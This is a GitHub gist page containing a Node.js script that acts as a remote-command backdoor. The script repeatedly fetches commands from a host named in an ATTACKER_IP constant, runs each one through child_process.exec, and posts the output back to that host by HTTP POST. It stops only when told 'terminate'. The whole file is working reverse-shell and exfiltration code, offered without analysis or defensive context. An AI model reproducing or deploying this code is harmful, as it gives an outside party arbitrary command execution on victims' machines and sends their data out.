Skip to content

Instantly share code, notes, and snippets.

@dgershman
Created October 26, 2022 01:02
Show Gist options
  • Save dgershman/122f3d914140ef020df68df6fc2ad621 to your computer and use it in GitHub Desktop.
Save dgershman/122f3d914140ef020df68df6fc2ad621 to your computer and use it in GitHub Desktop.
const http = require('http');
const exec = require("child_process").exec;
const ATTACKER_IP = "0.0.0.0"
const ATTACKER_PORT = 8080
const runCommand = function(command, callback) {
exec(command, (error, stdout, stderr) => {
console.log(stdout)
sendPost(stdout)
sendPost(stderr)
callback()
})
}
const sendPost = function(data) {
console.log(data)
let response_data = '';
let encoded_data = `rfile=${encodeURIComponent(data)}`;
let req = http.request({
hostname: ATTACKER_IP,
port: ATTACKER_PORT,
path: '/',
method: 'POST',
headers: {
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": encoded_data.length
}
}, (res) => {
res.on('data', (chunk) => {
response_data += chunk;
});
res.on('end', () => {
console.log(response_data)
});
}).on("error", (err) => {
console.log("Error: ", err)
})
req.write(encoded_data);
req.end()
}
function attach() {
const req = http.request({
hostname: ATTACKER_IP,
port: ATTACKER_PORT,
path: '/',
method: 'GET'
}, (res) => {
let command = ''
res.on('data', (chunk) => {
command += chunk;
});
// Ending the response
res.on('end', () => {
if (command === "terminate") {
return;
} else if (command === "grab") {
console.log("future")
attach()
} else {
runCommand(command, function() {
attach()
})
}
});
}).on("error", (err) => {
console.log("Error: ", err)
}).end();
}
attach()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment